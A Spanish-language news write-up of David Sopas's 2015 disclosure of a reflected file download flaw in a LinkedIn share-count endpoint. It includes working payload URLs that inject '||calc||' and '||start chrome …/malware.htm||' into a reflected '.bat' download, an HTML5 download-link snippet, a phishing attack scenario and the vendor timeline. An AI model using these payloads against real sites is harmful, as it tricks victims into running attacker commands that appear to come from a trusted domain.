El investigador de seguridad David sopas de WebSegura descubrió una vulnerabilidad de descarga reflejada en la popular red social para profesionales LinkedIn.
Él estaba analizando otro sitio web cuando descubrió la siguiente petición XHR en Google Inspector de LinkedIn:
https://www.linkedin.com/countserv/count/share?url=http://www.site_i_was_in.ptParece una simple petición hecha por los sitios web para contar cuántas acciones tiene su sitio en la red Linkedin.
Entonces sopas trató de modificar el parámetro de la petición, aquí su primer intento:
https://www.linkedin.com/countserv/count/share?url= "||calc||
y obtuvo la siguiente respuesta:
IN.Tags.Share.handleCount({“count”:0,”fCnt”:”0″,”fCntPlusOne”:”1″,”url”:”\”||calc||”});
Descubrió que el parámetro URL no se validó y se reflejo en el archivo JSON, luego trató de descargar el archivo y cambiarle el nombre a .bat para ejecutar la calculadora desde Windows.
Tenía que cambiar la ruta por lo que descargar un archivo batch y utilizo un comando diferente en Windows.
https://www.linkedin.com/countserv/count/share;setup.bat?url=”||start chrome websegura.net/malware.htm||
Se dio cuenta de que IE8 descarga automáticamente el archivo batch desde linkedin.com, asi que Sopas intentó lo mismo con otros navegadores, con el fin de hacer su prueba de descarga, hizo uso del atributo download en HTML5.
<div align="center">
<a href='https://www.linkedin.com/countserv/count/share;setup.bat?url="||start chrome websegura.net/malware.htm||' download="setup.bat" onclick="return false;">
<img src="http://damnlink.com/uploaded_images/godaddy_coupons_and_godaddy_promo_code_3187745288.png" border="0" />
¿Cómo puede un atacante explotar una vulnerabilidad de descarga reflejada?
Sopas describen el siguiente escenario de ataque:
El usuario malicioso envía un enlace a la víctima como lo haría con un CSRF o XSS (campañas de phishing, redes sociales, mensajería instantánea, mensajes, etc.)
La víctima hace clic en el enlace y confiando en la fuente (Linkedin) lo descarga
La víctima ejecuta el archivo y su equipo es comprometido
"Un usuario malintencionado podría incluso dar más credibilidad al sitio de descarga HTML5 si usa vulnerabilidades de redirecciones abiertas en sitios seguros como redirecciones abiertas en Google o incluso en Linkedin.", Escribió sopas en un blog.
Este tipo de ataque es muy insidioso porque las víctimas creen que un archivo se ofrece para su descarga desde el sitio web de confianza, en este caso, Linkedin, incluso si contiene un exploit malicioso que permite a un atacante comprometer su máquina.
Aquí la línea de tiempo para la falla LinkedIn proporcionada por Sopas:
05/11/2015 envió el informe al Linkedin
05/11/2015 LinkedIn no entendió la verdadera naturaleza del ataque
05/11/2015 Respondí con más información utilizando otros ataques RFD públicos y un documento de Oren Hafif sobre RFD
13-05-2015 Linkedin me dijo que están trabajando en una solución
02/06/2015 Pedí una actualización
03/06/2015 Linkedin respondió que me darán una actualización pronto
01/07/2015 Pedí de nuevo por una actualización
09/09/2015 Linkedin respondió que habían arreglado el problema
18-09-2015 Revelación completa de la falla
